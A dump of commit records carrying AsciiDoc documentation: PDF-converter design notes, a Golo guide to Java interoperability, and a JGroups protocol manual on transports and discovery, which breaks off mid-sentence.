catalog\n\n== Open Questions\n\n== Implementation\n\n* should we read SVG file using UTF-8 encoding; or does REXML handle encoding?\n* can we leverage before_rendering_page callback on table?\n* should we use move_past_bottom in some places instead of start_new_page?\n\n=== Design\n\n* remove\/reduce padding above heading when it appears at the start of a page?\n* Default line height?\n* Should the heading sizes be calculated according to the default font size?\n* Page margins\n* Body indentation?\n - recto \/ verso indentation?\n* Size of masthead \/ footer\n* Line separating masthead \/ footer?\n* Separate title page\n* Start chapter on new page?\n* Special layout for chapter page?\n\n=== Theme\n\n* keep or drop base_ prefix in theme? 
I think we should keep it because it provides context elsewhere in the document (e.g. $base_font_size vs $font_size)\n\n== Resources\n\n* https:\/\/code.google.com\/p\/origami-pdf\/[Origami PDF: A PDF inspection library]\n* https:\/\/github.com\/a1ee9b\/PrintPretty[A theme for PDF designed for printing]\n* http:\/\/randomtextgenerator.com[Random Text Generator, supports multiple languages]\n* http:\/\/clagnut.com\/blog\/2380[List of pangrams]\n - http:\/\/www.camcc.org\/_media\/reading-group\/qianziwen-en.pdf[1,000 character classic (Chinese)]\n* pdf2svg can convert the PDF file into an SVG (one SVG per page)\n* https:\/\/blog.codeship.com\/build-math-evaluation-engine[How to Build a Simple Math Evaluation Engine]\n* http:\/\/blog.typekit.com\/2011\/11\/03\/optimizing-fonts-for-the-web-unicode-values-glyph-set-underlines-and-strike-through\/[Optimizing Fonts for the Web]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4a10675283bf065d6c47dcea43641343fd319063","subject":"Doc on calling methods","message":"Doc on calling methods\n","repos":"titimoby\/golo-lang,smarr\/golo-lang,smarr\/golo-lang,jeffmaury\/golo-lang,mojavelinux\/golo-lang,Mogztter\/golo-lang,dynamid\/golo-lang-insa-citilab-historical-reference,jeffmaury\/golo-lang,mojavelinux\/golo-lang,Mogztter\/golo-lang,Mogztter\/golo-lang,jeffmaury\/golo-lang,titimoby\/golo-lang,franckverrot\/golo-lang,dynamid\/golo-lang-insa-citilab-historical-reference,dynamid\/golo-lang-insa-citilab-historical-reference,franckverrot\/golo-lang","old_file":"doc\/java-interop.asciidoc","new_file":"doc\/java-interop.asciidoc","new_contents":"== Java interoperability ==\n\nGolo aims at providing a seamless 2-way interoperability with the Java programming language.\n\n=== Calling static methods ===\n\nGolo can invoke public Java static methods by treating them as functions:\n\n[source,text]\n------------------------\nmodule sample\n\nimport java.util.Arrays\n\nfunction oneTwoThree = {\n return asList(1, 2, 3)\n}\n------------------------\n\nIn this example, `asList` is resolved from the `java.util.Arrays` import and called as a function.\nNote that we could equivalently have written a qualified invocation as `Arrays.asList(1, 2, 3)`.\n\n=== Calling instance methods ===\n\nWhen you have an object, you may invoke its methods using the `:` operator.\n\nThe following would call the `toString` method of any kind, then print it:\n\n[source,text]\n----------------------------------------\nprintln(\">>> \" + someObject: toString())\n----------------------------------------\n\nOf course, you may chain calls as long as a method is not of a `void` return type. Golo converts\nJava `void` methods by making them return `null`. This is neither a bug or a feature: the\n*invokedynamic* support on the JVM simply does so.\n\n=== Creating objects ===\n\nGolo doesn't have an instantiation operator like `new` in Java. 
Instead, creating an object and\ncalling its constructor is done as if it was just another function.\n\nAs an example, we may allocate a `java.util.LinkedList` as follows:\n\n[source,text]\n---------------------\nmodule sample\n\nimport java.util\n\nfunction aList = {\n return LinkedList()\n}\n---------------------\n\nAnother example would be using a `java.lang.StringBuilder`.\n\n[source,text]\n--------------------------------------\nfunction str_build = {\n return java.lang.StringBuilder(\"h\"):\n append(\"e\"):\n append(\"l\"):\n append(\"l\"):\n append(\"o\"):\n toString()\n}\n--------------------------------------\n\nAs one would expect, the `str_build` function above gives the `\"hello\"` string.\n\n=== Static fields ===\n\nGolo treats public static fields as function, so one could get the maximum value for an `Integer` as\nfollows:\n\n[source,text]\n--------------------------------------\nmodule samples.MaxInt\n\nlocal function max_int = {\n return java.lang.Integer.MAX_VALUE()\n}\n\nfunction main = |args| {\n println(max_int())\n}\n--------------------------------------\n\nNOTE: Given than most static fields are used as constants in Java, Golo does not provide support to\nchange their values. This may change in the future if compelling general-interest use-cases emerge.\n\n=== Inner classes and enumerations ===\n\nWe will illustrate both how to deal with public static inner classes and enumerations at once.\n\nThe rules to deal with them in Golo are as follows.\n\n1. Inner classes are identified by their real name in the JVM, with nested classes being separated\n by a `$` sign. Hence, `Thread.State` in Java is written `Thread$State` in Golo.\n2. Enumerations are just normal objects. They expose each entry as a static field, and each entry is\n an instance of the enumeration class.\n\nLet us consider the following example:\n\n[source,text]\n--------------------------------------------------------------------------\nmodule sample.EnumsThreadState\n\nimport java.lang.Thread$State\n\nfunction main = |args| {\n\n # Call the enum entry like a function\n let new = Thread$State.NEW()\n println(\"name=\" + new: name() + \", ordinal=\" + new: ordinal())\n\n # Walk through all enum entries\n foreach (element in atoList(Thread$State.values())) {\n println(\"name=\" + element: name() + \", ordinal=\" + element: ordinal())\n }\n}\n--------------------------------------------------------------------------\n\nRunning it yields the following console output:\n\n[source,console]\n------------------------------------------\n$ gologolo samples\/enums-thread-state.golo \nname=NEW, ordinal=0\nname=NEW, ordinal=0\nname=RUNNABLE, ordinal=1\nname=BLOCKED, ordinal=2\nname=WAITING, ordinal=3\nname=TIMED_WAITING, ordinal=4\nname=TERMINATED, ordinal=5\n$\n------------------------------------------\n\n=== Clashes with Golo operators and escaping ===\n\nBecause Golo provides a few named operators such as `is`, `and` or `not`, they are recognized as\noperator tokens.\n\nHowever, you may find yourself in a situation where you need to invoke a Java method whose name is\na Golo operator, such as:\n\n[source,text]\n-------------------------------------\n# Function call\nis()\n\n# Method call\nsomeObject: foo(): is(): not(): bar()\n-------------------------------------\n\nThis results in a parsing error, as `is` and `not` will be matched as operators instead of method\nidentifiers.\n\nThe solution is to use *escaping*, by prefixing identifiers with a backtick, as 
in:\n\n[source,text]\n---------------------------------------\n# Function call\n`is()\n\n# Method call\nsomeObject: foo(): `is(): `not(): bar()\n---------------------------------------\n\n\n","old_contents":"== Java interoperability ==\n\nGolo aims at providing a seamless 2-way interoperability with the Java programming language.\n\n=== Calling static methods ===\n\nGolo can invoke public Java static methods by treating them as functions:\n\n[source,text]\n------------------------\nmodule sample\n\nimport java.util.Arrays\n\nfunction oneTwoThree = {\n return asList(1, 2, 3)\n}\n------------------------\n\nIn this example, `asList` is resolved from the `java.util.Arrays` import and called as a function.\nNote that we could equivalently have written a qualified invocation as `Arrays.asList(1, 2, 3)`.\n\n=== Creating objects ===\n\nGolo doesn't have an instantiation operator like `new` in Java. Instead, creating an object and\ncalling its constructor is done as if it was just another function.\n\nAs an example, we may allocate a `java.util.LinkedList` as follows:\n\n[source,text]\n---------------------\nmodule sample\n\nimport java.util\n\nfunction aList = {\n return LinkedList()\n}\n---------------------\n\nAnother example would be using a `java.lang.StringBuilder`.\n\n[source,text]\n--------------------------------------\nfunction str_build = {\n return java.lang.StringBuilder(\"h\"):\n append(\"e\"):\n append(\"l\"):\n append(\"l\"):\n append(\"o\"):\n toString()\n}\n--------------------------------------\n\nAs one would expect, the `str_build` function above gives the `\"hello\"` string.\n\n=== Static fields ===\n\nGolo treats public static fields as function, so one could get the maximum value for an `Integer` as\nfollows:\n\n[source,text]\n--------------------------------------\nmodule samples.MaxInt\n\nlocal function max_int = {\n return java.lang.Integer.MAX_VALUE()\n}\n\nfunction main = |args| {\n println(max_int())\n}\n--------------------------------------\n\nNOTE: Given than most static fields are used as constants in Java, Golo does not provide support to\nchange their values. This may change in the future if compelling general-interest use-cases emerge.\n\n=== Inner classes and enumerations ===\n\nWe will illustrate both how to deal with public static inner classes and enumerations at once.\n\nThe rules to deal with them in Golo are as follows.\n\n1. Inner classes are identified by their real name in the JVM, with nested classes being separated\n by a `$` sign. Hence, `Thread.State` in Java is written `Thread$State` in Golo.\n2. Enumerations are just normal objects. 
They expose each entry as a static field, and each entry is\n an instance of the enumeration class.\n\nLet us consider the following example:\n\n[source,text]\n--------------------------------------------------------------------------\nmodule sample.EnumsThreadState\n\nimport java.lang.Thread$State\n\nfunction main = |args| {\n\n # Call the enum entry like a function\n let new = Thread$State.NEW()\n println(\"name=\" + new: name() + \", ordinal=\" + new: ordinal())\n\n # Walk through all enum entries\n foreach (element in atoList(Thread$State.values())) {\n println(\"name=\" + element: name() + \", ordinal=\" + element: ordinal())\n }\n}\n--------------------------------------------------------------------------\n\nRunning it yields the following console output:\n\n[source,console]\n------------------------------------------\n$ gologolo samples\/enums-thread-state.golo \nname=NEW, ordinal=0\nname=NEW, ordinal=0\nname=RUNNABLE, ordinal=1\nname=BLOCKED, ordinal=2\nname=WAITING, ordinal=3\nname=TIMED_WAITING, ordinal=4\nname=TERMINATED, ordinal=5\n$\n------------------------------------------\n\n=== Clashes with Golo operators and escaping ===\n\nBecause Golo provides a few named operators such as `is`, `and` or `not`, they are recognized as\noperator tokens.\n\nHowever, you may find yourself in a situation where you need to invoke a Java method whose name is\na Golo operator, such as:\n\n[source,text]\n-------------------------------------\n# Function call\nis()\n\n# Method call\nsomeObject: foo(): is(): not(): bar()\n-------------------------------------\n\nThis results in a parsing error, as `is` and `not` will be matched as operators instead of method\nidentifiers.\n\nThe solution is to use *escaping*, by prefixing identifiers with a backtick, as in:\n\n[source,text]\n---------------------------------------\n# Function call\n`is()\n\n# Method call\nsomeObject: foo(): `is(): `not(): bar()\n---------------------------------------\n\n\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"07ed0894550b1025d1b1edb1c322c070816872f3","subject":"Updated doc on FD_ALL suspect behavior","message":"Updated doc on FD_ALL suspect behavior\n","repos":"dimbleby\/JGroups,belaban\/JGroups,Sanne\/JGroups,TarantulaTechnology\/JGroups,belaban\/JGroups,dimbleby\/JGroups,pferraro\/JGroups,pruivo\/JGroups,rhusar\/JGroups,danberindei\/JGroups,pruivo\/JGroups,dimbleby\/JGroups,Sanne\/JGroups,danberindei\/JGroups,pferraro\/JGroups,TarantulaTechnology\/JGroups,belaban\/JGroups,TarantulaTechnology\/JGroups,Sanne\/JGroups,pruivo\/JGroups,danberindei\/JGroups,rhusar\/JGroups,rhusar\/JGroups,pferraro\/JGroups","old_file":"doc\/manual\/protocols.adoc","new_file":"doc\/manual\/protocols.adoc","new_contents":"[[protlist]]\n\n== List of Protocols\n\nThis chapter describes the most frequently used protocols, and their configuration. 
_Ergonomics_\n(<<Ergonomics>>) strives to reduce the number of properties that have to be configured, by\ndynamically adjusting them at run time, however, this is not yet in place.\n \n\nMeanwhile, we recommend that users should copy one of the predefined configurations (shipped with JGroups), e.g.\n+udp.xml+ or +tcp.xml+, and make only minimal changes to it.\n\nThis section is work in progress; we strive to update the documentation as we make changes to the code.\n \n\n[[CommonProps]]\n=== Properties availabe in every protocol\n\nThe table below lists properties that are available in all protocols, as they're defined in the superclass\nof all protocols, org.jgroups.stack.Protocol.\n \n\n.Properties of org.jgroups.stack.Protocol\n[align=\"left\",width=\"90%\",cols=\"2,10\",options=\"header\"]\n|===============\n|Name|Description\n| stats | Whether the protocol should collect protocol-specific runtime statistics. What those\n statistics are (or whether they even exist) depends on the particular protocol.\n See the `org.jgroups.stack.Protocol` javadoc for the available API related to statistics.\n Default is true.\n \n|ergonomics | Turns on ergonomics. See <<Ergonomics>> for details.\n \n|id | Gives the protocol a different ID if needed so we can have multiple instances of it in\n the same stack\n|===============\n\n\n[[Transport]]\n=== Transport\n\n`TP` is the base class for all transports, e.g. `UDP` and `TCP`. All of the properties\ndefined here are inherited by the subclasses. The properties for `TP` are:\n \n\n${TP}\n\n`bind_addr` can be set to the address of a network interface, e.g. +192.168.1.5+.\nIt can also be set for the entire stack using system property +$$-Djgroups.bind_addr$$+, which\nprovides a value for bind_addr unless it has already been set in the XML config.\n \n\nThe following special values are also recognized for ++$$bind_addr$$++:\n \n\nGLOBAL:: Picks a global IP address if available. If not, falls back to a SITE_LOCAL IP address.\n\nSITE_LOCAL:: Picks a site local (non routable) IP address, e.g. from the +192.168.0.0+ or\n +10.0.0.0+ address range.\n\nLINK_LOCAL:: Picks a link-local IP address, from +169.254.1.0+ through\n +169.254.254.255+.\n\nNON_LOOPBACK:: Picks _any_ non loopback address.\n \nLOOPBACK:: Pick a loopback address, e.g. +127.0.0.1+.\n\nmatch-interface:: Pick an address which matches a pattern against the interface name,\n e.g. +match-interface:eth.\\*+\n\nmatch-address:: Pick an address which matches a pattern against the host address,\n e.g. +match-address:192.168.\\*+\n\nmatch-host:: Pick an address which matches a pattern against the host name,\n e.g. +match-host:linux.\\*+\n \nAn example of setting the bind address in UDP to use a site local address is:\n \n[source,xml]\n----\n<UDP bind_addr=\"SITE_LOCAL\" \/>\n----\n\nThis will pick any address of any interface that's site-local, e.g. a +192.168.x.x+ or\n+10.x.x.x+ address.\n \n\n[[UDP]]\n==== UDP\n\nUDP uses IP multicast for sending messages to all members of a group and UDP datagrams for unicast\nmessages (sent to a single member). When started, it opens a unicast and multicast socket: the unicast\nsocket is used to send\/receive unicast messages, whereas the multicast socket sends and receives multicast\nmessages. The channel's physical address will be the address and port number of the unicast socket.\n \nA protocol stack with UDP as transport protocol is typically used with clusters whose members run\nin the same subnet. 
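\n\nAs a concrete reference, a minimal UDP transport element might look like the following sketch; the multicast address and port are illustrative values, not recommended defaults:\n\n[source,xml]\n----\n<!-- illustrative values; adjust to your network -->\n<UDP bind_addr=\"SITE_LOCAL\"\n mcast_addr=\"228.8.8.8\"\n mcast_port=\"45588\" \/>\n----\n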
If running across subnets, an admin has to ensure that\nIP multicast is enabled across subnets. It is often the case that IP multicast is not enabled across\nsubnets. In such cases, the stack has to either use UDP without IP multicasting or other transports\nsuch as TCP.\n \n\n${UDP}\n\n\n[[TCP]]\n==== TCP\n\nSpecifying TCP in your protocol stack tells JGroups to use TCP to send messages between cluster members.\nInstead of using a multicast bus, the cluster members create a mesh of TCP connections.\n \nFor example, while UDP sends 1 IP multicast packet when sending a message to a cluster of 10 members,\nTCP needs to send the message 9 times. It sends the same message to the first member, to the second\nmember, and so on (excluding itself as the message is looped back internally).\n\nThis is slow, as the cost of sending a group message is O(n) with TCP, where it is O(1) with UDP. As the\ncost of sending a group message with TCP is a function of the cluster size, it becomes higher with\nlarger clusters.\n \n\nNOTE: We recommend to use UDP for larger clusters, whenever possible\n\n\n${BasicTCP}\n\n${TCP}\n\n\n[[TCP_NIO2]]\n==== TCP_NIO2\n\nTCP_NIO2 is similar to <<TCP>>, but uses NIO (= Non blocking IO) to send messages to and receive messages\nfrom members. Contrary to TCP, it doesn't use 1 thread per connection, but handles accepts, connects, reads and\nwrites in a *single thread*.\n\nAll of these operations are guaranteed to never block.\n\nFor example, if a read is supposed to receive 1000 bytes and only reveived 700, the read reads the 700 bytes, saves\nthem somewhere and later - when the remaining 300 bytes have been received - is notified to complete the read\nand then returns the 1000 bytes to the application.\n\nUsing a single thread is not a problem, as operations will never block. The only potentially blocking operation,\nnamely delivering messages up to the application, is done via the regular or OOB thread pools, as usual.\n\nWhile <<TCP>> and <<TCP_NIO2>> both have the N-1 problem of sending cluster wide messages (contrary to <<UDP>>),\nTCP_NIO2 is able to handle a larger number of connections than TCP, as it doesn't use the thread-per-connection model,\nand - contrary to TCP, but similar to UDP - it doesn't block when sending or receiving messages.\n\n${BasicTCP}\n\n${TCP_NIO2}\n\n\n[[TUNNEL]]\n\n\n==== TUNNEL\nTUNNEL is described in <<TUNNEL_Advanced>>.\n \n\n${TUNNEL}\n\n\n[[DiscoveryProtocols]]\n=== Initial membership discovery\n\nThe task of the discovery is to find an initial membership, which is used to determine the current\ncoordinator. Once a coordinator is found, the joiner sends a JOIN request to the coord.\n\nDiscovery is also called periodically by `MERGE2` (see <<MERGE2>>), to see if we have\ndiverging cluster membership information.\n \n\n[[Discovery]]\n==== Discovery\n\n`Discovery` is the superclass for all discovery protocols and therefore its\nproperties below can be used in any subclass.\n\nDiscovery sends a discovery request, and waits for +$$num_initial_members$$+ discovery\nresponses, or +timeout+ ms, whichever occurs first, before returning. Note that\n+$$break_on_coord_rsp=\"true\"$$+ will return as soon as we have a response from a coordinator.\n \n\n${Discovery}\n\n[[DiscoveryAndCaches]]\n===== Discovery and local caches\n\nBesides finding the current coordinator in order to send a JOIN request to it, discovery also\nfetches information about members and adds it to its local caches. 
This information includes\nthe logical name, UUID and IP address\/port of each member. When discovery responses are received,\nthe information in it will be added to the local caches.\n \n\nSince 3.5 it is possible to define this information in a single file, with each line providing\ninformation about one member. The file contents look like this:\n\n\n----\nm1.1 1 10.240.78.26:7800 T\nm2.1 2 10.240.122.252:7800 F\nm3.1 3 10.240.199.15:7800 F\n----\n\nThis file defines information about 3 members m1.1, m2.1 and m3.1. The first element (\"m1.1\") is the\nlogical name. Next comes the UUID (1), followed by the IP address and port (`10.240.78.26:7800`).\nT means that the member is the current coordinator.\n \nMethods `dumpCache()` can be used to write the current contents of any member to a file (in the above\nformat) and `addToCache()` can be used to add the contents of a file to any member. These operations\ncan for example be invoked via JMX or probe.sh.\n \nRefer to the section on `FILE_PING` for more information on how to use these files to speed up\nthe discovery process.\n \n\n[[PING]]\n==== PING\n\nInitial (dirty) discovery of members. Used to detect the coordinator (oldest member), by\nmcasting PING requests to an IP multicast address.\n \nEach member responds with a packet {C, A}, where C=coordinator's address and A=own address. After N\nmilliseconds or M replies, the joiner determines the coordinator from the responses, and sends a\nJOIN request to it (handled by GMS). If nobody responds, we assume we are the first member of a group.\n \nUnlike TCPPING, PING employs dynamic discovery, meaning that the member does not have to know in advance\nwhere other cluster members are.\n \nPING uses the IP multicasting capabilities of the transport to send a discovery\nrequest to the cluster. It therefore requires UDP as transport.\n \n\n${PING}\n\n\n[[TCPPING_Prot]]\n==== TCPPING\n\nTCPPING is used with TCP as transport, and uses a static list of cluster members's addresses. See\n<<TCPPING>> for details.\n \n\n${TCPPING}\n\nNOTE: It is recommended to include the addresses of _all_ cluster members in `initial_hosts`.\n \n\n\n[[TCPGOSSIP_Prot]]\n==== TCPGOSSIP\n\nTCPGOSSIP uses an external GossipRouter to discover the members of a cluster. See <<TCPGOSSIP>>\nfor details.\n \n\n${TCPGOSSIP}\n\n[[MPING]]\n==== MPING\n\nMPING (=Multicast PING) uses IP multicast to discover the initial membership. It can be used with all\ntransports, but usually is used in combination with TCP. TCP usually requires TCPPING, which has to list\nall cluster members explicitly, but MPING doesn't have this requirement. The typical use case for this\nis when we want TCP as transport, but multicasting for discovery so we don't have to define a static\nlist of initial hosts in TCPPING\n \nMPING uses its own multicast socket for discovery. Properties +$$bind_addr$$+ (can also\nbe set via ++$$-Djgroups.bind_addr=$$++), +$$mcast_addr$$+ and\n+$$mcast_port$$+ can be used to configure it.\n \nNote that MPING requires a separate thread listening on the multicast socket for discovery requests.\n \n\n${MPING}\n\n[[FILE_PING]]\n==== FILE_PING\n\nFILE_PING can be used instead of GossipRouter in cases where no external process is desired.\n \n\nSince 3.5, the way FILE_PING performs discovery has changed. The following paragraphs describe the new\nmechanism to discover members via FILE_PING or subclasses (e.g. 
S3_PING or GOOGLE_PING),\nso this applies to all cloud-based stores as well.\n \nInstead of storing 1 file per member in the file system or cloud store, we only store 1 file for\n_all_ members. This has the advantage, especially in cloud stores, that the number\nof reads is not a function of the cluster size, e.g. we don't have to perform 1000 reads for member\ndiscovery in a 1000 node cluster, but just a single read. This is important as the cost of\n1000 times the round trip time of a (REST) call to the cloud store is certainly higher that the cost\nof a single call. There may also be a charge for calls to the cloud, so a reduced number of calls lead\nto reduced charges for cloud store access, especially in large clusters.\n\n\nThe current coordinator is always in charge of writing the file; participants never write it, but only\nread it. When there is a split and we have multiple coordinator, we may also have multiple files.\n \n\nThe name of a file is always UUID.logical_name.list, e.g. `0000-0000-000000000001.m1.1.list`, which has\na UUID of 1, a logical name of \"m1.1\" and the suffix \".list\".\n \n\n[[BootstrapConfiguration]]\n===== Configuration with a preconfigured bootstrap file\n\nTo speed up the discovery process when starting a large cluster, a predefined bootstrap file\ncan be used. Every node then needs to have an entry in the file and its UUID and IP address:port\nneeds to be the same as in the file. For example, when using the following bootstrap file:\n\n\n----\nm1.1 1 10.240.78.26:7800 T\nm2.1 2 10.240.122.252:7800 F\nm3.1 3 10.240.199.15:7800 F\n----\n\n, the member called \"m1.1\" needs to have a UUID of 1, and needs to run on host 10.240.78.26 on\nport 7800. The UUID can be injected via an AddressGenerator (see UPerf for an example).\n \nWhen a member starts, it loads the bootstrap file, which contains information about all other members,\nand thus (ideally) never needs to run a discovery process. In the above example, the new joiner also\nknows that the current coordinator (marked with a 'T') is m1.1, so it can send its JOIN request to\nthat node.\n \nWhen the coordinator changes, or members not listed in the file join, the current coordinator\nwrites the file again, so all members have access to the updated information when needed.\n\nIf a bootstrap discovery file is to be used, it needs to be placed into the file system or cloud\nstore in the correct location and with the right name (see the Discovery section for naming details).\n\nThe design is discussed in more detail in\nlink:$$https:\/\/github.com\/belaban\/JGroups\/blob\/master\/doc\/design\/CloudBasedDiscovery.txt$$[CloudBasedDiscovery.txt]\n\n\n===== Removal of zombie files\n\nBy default, a new coordinator C never removes a file created by an old coordinator `A`. E.g. in `{A,B,C,D}` (with\ncoordinator `A`), if `C` becomes coordinator on a split `{A,B} | {C,D}`, then `C` doesn't remove `A`'s file, as there\nis no way for `C` to know whether `A` crashed or whether `A` was partitioned away.\n\nEvery coordinator `P` installs a shutdown hook which removes `P`'s file on termination. However, this doesn't apply\nto a process killed ungracefully, e.g. by `kill -9`. In this case, no shutdown hook will get called. If we had view\n`{A,B,C}`, and `A` was killed via kill -9, and `B` takes over, we'd have files `A.list` and `B.list`.\n\nTo change this, attribute `remove_old_coords_on_view_change` can be set to true. In this case, files created by old\ncoordinators will be removed. 
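\n\nExpressed as configuration, this could look like the following sketch (the shared location is illustrative; the removal flag is off by default):\n\n[source,xml]\n----\n<!-- illustrative shared directory -->\n<FILE_PING location=\"\/var\/lib\/jgroups\"\n remove_old_coords_on_view_change=\"true\" \/>\n----\n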
In the scenario above, where `A` crashed, `B` would remove `A.list`.\n\nHowever, if we have a split between `{A,B}` and `{C,D}`, `C` would remove `A.list`. To prevent this, every coordinator\nwrites its file again on a view change that has left members or in which the coordinator changed.\n\nThere is still a case which can end up with a zombie file that's never removed: when we have a single member `A` and\nit is killed via `kill -9`. In this case, file `A.list` will never get cleaned up and subsequent joiners will ask\n`A` to join, up to `GMS.max_join_attempts` times.\n\nZombie cleanup can be solved by setting `remove_all_files_on_view_change` to true. In this case, a coordinator\nremoves _all files_ on a view change that has members leaving or changes the coordinator.\n\nNOTE: Setting `remove_old_coords_on_view_change` or `remove_all_files_on_view_change` to true generates more traffic\nto the file system or cloud store. If members are always shut down gracefully, or never killed via `kill -9`, then\nit is recommended to set both attributes to false.\n\n\n${FILE_PING}\n\n\n\n==== JDBC_PING\n\nJDBC_PING uses a DB to store information about cluster nodes used for discovery. All cluster nodes are supposed to be\nable to access the same DB.\n\nWhen a node starts, it queries information about existing members from the database, determines the coordinator and\nthen asks the coord to join the cluster. It also inserts information about itself into the table, so others can\nsubsequently find it.\n\nWhen a node P has crashed, the current coordinator removes P's information from the DB. However, if there is a network\nsplit, then this can be problematic, as crashed members cannot be told from partitioned-away members.\n\nFor instance, if we have `{A,B,C,D}`, and the split creates 2 subclusters `{A,B}` and `{C,D}`,\nthen `A` would remove `{C,D}` because it thinks they crashed, and - likewise - `C` would remove `{A,B}`.\n\nTo solve this, every member re-inserts its information into the DB after a _view change_. So when `C` and `D`'s view\nchanges from `{A,B,C,D}` to `{C,D}`, both sides of the split re-insert their information.\nDitto for the other side of the network split.\n\nThe re-insertion is governed by attributes `info_writer_max_writes_after_view` and `info_writer_sleep_time`: the former\ndefines the number of times re-insertion should be done (in a timer task) after each view change and the latter is the\nsleep time (in ms) between re-insertions.\n\nThe value of this is that dead members are removed from the DB (because they cannot do re-insertion), but network splits\nare handled, too.\n\nAnother attribute `clear_table_on_view_change` governs how zombies are handled. Zombies are table entries for members\nwhich crashed, but weren't removed for some reason. E.g. if we have a single member `A` and kill it (via kill -9), then\nit won't get removed from the table.\n\nIf `clear_table_on_view_change` is set to true, then the coordinator _clears_ the table after a view change (instead of\nonly removing the crashed members), and everybody re-inserts its own information. This attribute can be set to true if\nautomatic removal of zombies is desired. However, it is costly, therefore if no zombies ever occur (e.g. 
because processes\nare never killed with kill -9), or zombies are removed by a system admin, then it should be set to false.\n\nNOTE: Processes killed with kill -3 are removed from the DB as a shutdown handler will be called on kill -3\n(but not on kill -9).\n \n\n${JDBC_PING}\n\n\n\n==== BPING\n\nBPING uses UDP broadcasts to discover other nodes. The default broadcast address (dest) is\n 255.255.255.255, and should be replaced with a subnet specific broadcast, e.g. 192.168.1.255.\n \n\n${BPING}\n\n\n\n==== RACKSPACE_PING\n\nRACKSPACE_PING uses Rackspace Cloud Files Storage to discover initial members. Each node writes a small\n object in a shared Rackspace container. New joiners read all addresses from the container and ping each\n of the elements of the resulting set of members. When a member leaves, it deletes its corresponding object.\n \n\nThis objects are stored under a container called 'jgroups', and each node will write an object name after\n the cluster name, plus a \"\/\" followed by the address, thus simulating a hierarchical structure.\n \n\n${RACKSPACE_PING}\n\n\n\n==== S3_PING\n\nS3_PING uses Amazon S3 to discover initial members. New joiners read all addresses\nfrom this bucket and ping each of the elements of the resulting set of members. When a member leaves, it\ndeletes its corresponding file.\n \n\nIt's designed specifically for members running on Amazon EC2, where multicast traffic is not allowed and\nthus MPING or PING will not work. When Amazon RDS is preferred over S3, or if a shared database is used,\nan alternative is to use JDBC_PING.\n \n\nEach instance uploads a small file to an S3 bucket and each instance reads the files out of this bucket\nto determine the other members.\n \n\nThere are three different ways to use S3_PING, each having its own tradeoffs between security and\nease-of-use. These are described in more detail below:\n\n* Private buckets, Amazon AWS credentials given to each instance\n* Public readable and writable buckets, no credentials given to each instance\n* Public readable but private writable buckets, pre-signed URLs given to each instance\n Pre-signed URLs are the most secure method since writing to buckets still requires authorization and\n you don't have to pass Amazon AWS credentials to every instance. However, they are also the most complex\n to setup.\n \n\nHere's a configuration example for private buckets with credentials given to each instance:\n \n\n\n[source,xml]\n----\n\n<S3_PING location=\"my_bucket\" access_key=\"access_key\"\n secret_access_key=\"secret_access_key\" timeout=\"2000\"\n num_initial_members=\"3\"\/>\n \n----\n\nHere's an example for public buckets with no credentials:\n \n\n\n[source,xml]\n----\n\n<S3_PING location=\"my_bucket\"\n timeout=\"2000\" num_initial_members=\"3\"\/>\n \n----\n\nAnd finally, here's an example for public readable buckets with pre-signed URLs:\n \n\n\n[source,xml]\n----\n\n<S3_PING pre_signed_put_url=\"http:\/\/s3.amazonaws.com\/my_bucket\/DemoCluster\/node1?AWSAccessKeyId=access_key&Expires=1316276200&Signature=it1cUUtgCT9ZJyCJDj2xTAcRTFg%3D\"\n pre_signed_delete_url=\"http:\/\/s3.amazonaws.com\/my_bucket\/DemoCluster\/node1?AWSAccessKeyId=access_key&Expires=1316276200&Signature=u4IFPRq%2FL6%2FAohykIW4QrKjR23g%3D\"\n timeout=\"2000\" num_initial_members=\"3\"\/>\n \n----\n\n${S3_PING}\n\n\n\n==== AWS_PING\n\nThis is a protocol written by Meltmedia, which uses the AWS API. 
It is not part of JGroups, but can be\ndownloaded at link:$$http:\/\/meltmedia.github.io\/jgroups-aws\/$$[].\n\n\n==== Native S3 PING\n\nThis implementation by Zalando uses the AWS SDK. It is not part of JGroups, but can be found at\nlink:$$https:\/\/github.com\/zalando\/jgroups-native-s3-ping\/$$[].\n\n\n\n==== GOOGLE_PING\n\nGOOGLE_PING is a subclass of S3_PING and inherits most of the functionality. It uses Google Cloud\n Storage to store information about individual members.\n \n\nThe snippet below shows a sample config:\n \n\n\n[source,xml]\n----\n\n<GOOGLE_PING\n location=\"jgroups-bucket\"\n access_key=\"GXXXXXX\"\n secret_access_key=\"YYYYYY\"\n timeout=\"2000\" num_initial_members=\"3\"\/>\n \n----\n\nThis will use a bucket \"jgroups-bucket\" or create one if it doesn't exist, then create another folder\n under it with the cluster name, and finally use 1 object per member in that location for member info.\n \n\n${GOOGLE_PING}\n\n\n\n==== SWIFT_PING\n\nSWIFT_PING uses Openstack Swift to discover initial members. Each node writes a small\n object in a shared container. New joiners read all addresses from the container and ping each\n of the elements of the resulting set of members. When a member leaves, it deletes its corresponding object.\n \n\nThese objects are stored under a container called 'jgroups' (by default), and each node will write an object name after\n the cluster name, plus a \"\/\" followed by the address, thus simulating a hierarchical structure.\n \n\nCurrently only Openstack Keystone authentication is supported. Here is a sample configuration block:\n \n\n\n[source,xml]\n----\n\n<SWIFT_PING timeout=\"2000\"\n num_initial_members=\"3\"\n auth_type=\"keystone_v_2_0\"\n auth_url=\"http:\/\/localhost:5000\/v2.0\/tokens\"\n username=\"demo\"\n password=\"password\"\n tenant=\"demo\" \/>\n \n----\n\n${SWIFT_PING}\n\n\n\n\n\n==== PDC - Persistent Discovery Cache\n\nThe Persistent Discovery Cache can be used to cache the results of the discovery process persistently.\nE.g. if we have TCPPING.initial_hosts configured to include only members A and B, but have a lot more\nmembers, then other members can bootstrap themselves and find the right coordinator even when neither\nA nor B are running.\n \n\nAn example of a TCP-based stack configuration is:\n \n\n\n[source,xml]\n----\n\n<TCP \/>\n<PDC cache_dir=\"\/tmp\/jgroups\" \/>\n<TCPPING timeout=\"2000\" num_initial_members=\"20\"\n initial_hosts=\"192.168.1.5[7000]\" port_range=\"0\"\n return_entire_cache=\"true\"\n use_disk_cache=\"true\" \/>\n \n----\n\n${PDC}\n\n\n\n=== Merging after a network partition\n\n[[MERGE2]]\n==== MERGE2\n\nIf a cluster gets split for some reasons (e.g. network partition), this protocol merges the subclusters\nback into one cluster. It is only run by the coordinator (the oldest member in a cluster), which\nperiodically multicasts its presence and view information. If another coordinator (for the same cluster)\nreceives this message, it will initiate a merge process. Note that this merges 